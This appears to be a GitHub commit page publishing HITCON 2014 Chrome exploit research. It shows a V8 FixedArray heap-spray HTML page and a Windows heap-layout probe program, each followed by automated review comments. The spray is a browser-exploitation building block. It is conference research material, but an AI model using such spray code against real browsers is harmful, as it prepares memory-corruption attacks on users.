

Slides, white paper, Chrome exploit, PoC simplify
Add HITCON X 2014 slides, white paper, Chrome exploit and simplified PoC
(minimized test case)
demi6od committed Aug 28, 2014
1 parent dcb73d5 commit 873dc40
Showing 14 changed files with 1,701 additions and 0 deletions.
658 changes: 658 additions & 0 deletions Google Chrome/ChromeExpLib.js


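--- a/Google Chrome/FixedArray Spray.html
+++ b/Google Chrome/FixedArray Spray.html
@@ -0,0 +1,124 @@
+<!--
+Author: Chen Zhang (@demi6od) <[email protected]>
+Date: 2014 May 23rd
+-->
+
+<html>
+<script>
+function dword2Int(data) {
+return data >> 1;
+}
+
+/* Spray memory layout
+------------------------
+|map|length|number << 1|
+------------------------
+| number << 1 |
+| number << 1 |
+| number << 1 |
+| ... |
+| object pointer | 1 |
+| object pointer | 1 |
+| object pointer | 1 |
+| ... |
+------------------------
+*/
+function fixedArrSpray() {
+fixedArrs = [];
+
+var map = 0x4;
+var length = 0x4;
+var fixedArrSize = 0x10000;
+var fixedArrLen = (fixedArrSize - map - length) / 4;
+
+var fixedArrNum = 0x1000;
+
+for (var i = 0; i < fixedArrNum; i++) {
+fixedArrs[i] = new Array(fixedArrLen);
+
+for (var j = 0; j < fixedArrLen ; j += 0x40) {
+fixedArrs[i][j + 0x0] = dword2Int(0x41410001);
+fixedArrs[i][j + 0x1] = dword2Int(0x41410011);
+fixedArrs[i][j + 0x2] = dword2Int(0x41410021);
+fixedArrs[i][j + 0x3] = dword2Int(0x41410031);
+fixedArrs[i][j + 0x4] = dword2Int(0x41410041);
+fixedArrs[i][j + 0x5] = dword2Int(0x41410051);
+fixedArrs[i][j + 0x6] = dword2Int(0x41410061);
+fixedArrs[i][j + 0x7] = dword2Int(0x41410071);
+fixedArrs[i][j + 0x8] = dword2Int(0x41410081);
+fixedArrs[i][j + 0x9] = dword2Int(0x41410091);
+fixedArrs[i][j + 0xa] = dword2Int(0x414100a1);
+fixedArrs[i][j + 0xb] = dword2Int(0x414100b1);
+fixedArrs[i][j + 0xc] = dword2Int(0x414100c1);
+fixedArrs[i][j + 0xd] = dword2Int(0x414100d1);
+fixedArrs[i][j + 0xe] = dword2Int(0x414100e1);
+fixedArrs[i][j + 0xf] = dword2Int(0x414100f1);
+
+fixedArrs[i][j + 0x10] = dword2Int(0x41410101);
+fixedArrs[i][j + 0x11] = dword2Int(0x41410111);
+fixedArrs[i][j + 0x12] = dword2Int(0x41410121);
+fixedArrs[i][j + 0x13] = dword2Int(0x41410131);
+fixedArrs[i][j + 0x14] = dword2Int(0x41410141);
+fixedArrs[i][j + 0x15] = dword2Int(0x41410151);
+fixedArrs[i][j + 0x16] = dword2Int(0x41410161);
+fixedArrs[i][j + 0x17] = dword2Int(0x41410171);
+fixedArrs[i][j + 0x18] = dword2Int(0x41410181);
+fixedArrs[i][j + 0x19] = dword2Int(0x41410191);
+fixedArrs[i][j + 0x1a] = dword2Int(0x414101a1);
+fixedArrs[i][j + 0x1b] = dword2Int(0x414101b1);
+fixedArrs[i][j + 0x1c] = dword2Int(0x414101c1);
+fixedArrs[i][j + 0x1d] = dword2Int(0x414101d1);
+fixedArrs[i][j + 0x1e] = dword2Int(0x414101e1);
+fixedArrs[i][j + 0x1f] = dword2Int(0x414101f1);
+
+fixedArrs[i][j + 0x20] = dword2Int(0x41410201);
+fixedArrs[i][j + 0x21] = dword2Int(0x41410211);
+fixedArrs[i][j + 0x22] = dword2Int(0x41410221);
+fixedArrs[i][j + 0x23] = dword2Int(0x41410231);
+fixedArrs[i][j + 0x24] = dword2Int(0x41410241);
+fixedArrs[i][j + 0x25] = dword2Int(0x41410251);
+fixedArrs[i][j + 0x26] = dword2Int(0x41410261);
+fixedArrs[i][j + 0x27] = dword2Int(0x41410271);
+fixedArrs[i][j + 0x28] = dword2Int(0x41410281);
+fixedArrs[i][j + 0x29] = dword2Int(0x41410291);
+fixedArrs[i][j + 0x2a] = dword2Int(0x414102a1);
+fixedArrs[i][j + 0x2b] = dword2Int(0x414102b1);
+fixedArrs[i][j + 0x2c] = dword2Int(0x414102c1);
+fixedArrs[i][j + 0x2d] = dword2Int(0x414102d1);
+fixedArrs[i][j + 0x2e] = dword2Int(0x414102e1);
+fixedArrs[i][j + 0x2f] = dword2Int(0x414102f1);
+
+fixedArrs[i][j + 0x30] = dword2Int(0x41410301);
+fixedArrs[i][j + 0x31] = dword2Int(0x41410311);
+fixedArrs[i][j + 0x32] = dword2Int(0x41410321);
+fixedArrs[i][j + 0x33] = dword2Int(0x41410331);
+fixedArrs[i][j + 0x34] = dword2Int(0x41410341);
+fixedArrs[i][j + 0x35] = dword2Int(0x41410351);
+fixedArrs[i][j + 0x36] = dword2Int(0x41410361);
+fixedArrs[i][j + 0x37] = dword2Int(0x41410371);
+
+fixedArrs[i][j + 0x38] = dword2Int(0x41410381);
+fixedArrs[i][j + 0x39] = dword2Int(0x41410391);
+fixedArrs[i][j + 0x3a] = dword2Int(0x414103a1);
+fixedArrs[i][j + 0x3b] = dword2Int(0x414103b1);
+fixedArrs[i][j + 0x3c] = dword2Int(0x414103c1);
+fixedArrs[i][j + 0x3d] = dword2Int(0x414103d1);
+
+if ((j + 0x3e) != fixedArrLen) {
+fixedArrs[i][j + 0x3e] = dword2Int(0x414103e1);
+fixedArrs[i][j + 0x3f] = dword2Int(0x414103f1);
+}
+}
+
+// Set fixed array start and end tag
+fixedArrs[i][0] = dword2Int(0x0eadc0de);
+fixedArrs[i][fixedArrLen - 1] = dword2Int(0x0eadc0de);
+}
+}
+
+fixedArrSpray();
+
+// For debug break point
+parseFloat('1.1');
+</script>
+</html>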
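Review bot: `dword2Int` at the top of the script silently drops bit 0 of its argument: the array stores `data >> 1`, and the layout comment shows V8 re-tagging it as `number << 1`, so a pattern word such as 0x41410001 lands in memory as 0x41410000, while the 0x0eadc0de start/end tags round-trip only because their low bit is already clear. A comment on the helper should make that explicit, e.g. `// Smi-encode a 32-bit word: V8 stores (value << 1), so bit 0 of data is lost and data must fit in 31 bits`. The 4-byte `map` and `length` fields and that tagging assume a 32-bit V8 build; on a 64-bit build the FixedArray header and Smi encoding differ, which is worth stating next to `var map = 0x4;`. `fixedArrs = [];` is assigned without `var` and so becomes an implicit global; if that is deliberate so the sprayed arrays remain reachable after `fixedArrSpray()` returns, declare it at script top level as `var fixedArrs;` with a comment saying why, otherwise the `new Array(fixedArrLen)` backing stores are free to be collected.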
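--- a/Google Chrome/Windows Heap Test.cpp
+++ b/Google Chrome/Windows Heap Test.cpp
@@ -0,0 +1,72 @@
+// Windows Heap Test.cpp : Defines the entry point for the console application.
+
+#include "stdafx.h"
+#include <windows.h>
+#include <iostream>
+
+using namespace std;
+
+int _tmain(int argc, _TCHAR* argv[]) {
+cout << "[+] Start" << endl;
+
+int debug = 0;
+cout << "[+] Wait for debug" << endl;
+cin >> debug;
+
+// Copy the hardware information to the SYSTEM_INFO structure.
+SYSTEM_INFO siSysInfo;
+GetSystemInfo(&siSysInfo);
+
+// Display the contents of the SYSTEM_INFO structure.
+cout << "[+] Hardware information:" << endl;
+cout << "Page size: 0x" << hex << siSysInfo.dwPageSize << endl;
+cout << "VirtualAlloc Allocation granularity : 0x" << hex << siSysInfo.dwAllocationGranularity << endl;
+
+LPVOID lpvResult[10];
+HANDLE hHeap[10];
+HANDLE hHeapBlock[10];
+HANDLE hDefaultHeapBlock[10];
+HANDLE hLargeHeapBlock[10];
+
+unsigned int virtualSize = 0x100000;
+unsigned int heapSize = 0x10000;
+unsigned int heapBlockSize = 0x1000;
+unsigned int largeHeapBlockSize = 0x100000;
+unsigned int heapBlockHeadLen = 0x8;
+unsigned int largeHeapBlockHeadLen = 0x20;
+unsigned int base = 0;
+
+cout << "\n[+] VirtualAlloc" << endl;
+for (int i = 0; i < 10; i++) {
+lpvResult[i] = VirtualAlloc((LPVOID)base, virtualSize, MEM_COMMIT, PAGE_READWRITE);
+cout << i << ": " << lpvResult[i] << endl;
+}
+
+cout << "\n[+] HeapCreate" << endl;
+for (int i = 0; i < 10; i++) {
+hHeap[i] = HeapCreate(base, heapSize, 0);
+cout << i << ": " << hHeap[i] << endl;
+}
+
+cout << "\n[+] HeapAlloc" << endl;
+for (int i = 0; i < 10; i++) {
+hHeapBlock[i] = HeapAlloc(hHeap[0], 0, heapBlockSize - heapBlockHeadLen);
+cout << i << ": " << hHeapBlock[i] << endl;
+}
+
+cout << "\n[+] Default HeapAlloc" << endl;
+for (int i = 0; i < 10; i++) {
+hDefaultHeapBlock[i] = HeapAlloc(GetProcessHeap(), 0, heapBlockSize - heapBlockHeadLen);
+cout << i << ": " << hDefaultHeapBlock[i] << endl;
+}
+
+cout << "\n[+] Large HeapAlloc" << endl;
+for (int i = 0; i < 10; i++) {
+hLargeHeapBlock[i] = HeapAlloc(GetProcessHeap(), 0, largeHeapBlockSize - largeHeapBlockHeadLen);
+cout << i << ": " << hLargeHeapBlock[i] << endl;
+}
+
+cout << "\n[+] End" << endl;
+return 0;
+}
+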
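Review bot: None of the allocation results in `_tmain` are checked before use: `hHeap[0]` returned by `HeapCreate` is passed straight into the `[+] HeapAlloc` loop, and calling `HeapAlloc` on a NULL heap handle is undefined behaviour rather than a diagnosable failure. Before that loop add `if (hHeap[0] == NULL) { cerr << "[-] HeapCreate failed: " << GetLastError() << endl; return 1; }`, and print `GetLastError()` whenever a `VirtualAlloc` or `HeapAlloc` result is NULL so a printed 0 is not mistaken for a valid address in the layout output. The constants `heapBlockHeadLen = 0x8` and `largeHeapBlockHeadLen = 0x20` are presumably the 32-bit NT heap block header and large-block overhead being subtracted to land on the intended total sizes, but nothing says so; a comment like `// 32-bit NT heap: 8-byte block header; large blocks carry extra front overhead — revisit for x64` would make the subtraction legible and flag that a 64-bit build needs different values. The heaps and blocks are never released (`HeapFree`, `HeapDestroy`, `VirtualFree`); for a probe that exits immediately that is acceptable, but a one-line comment stating it is intentional would stop it being reported as a leak.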
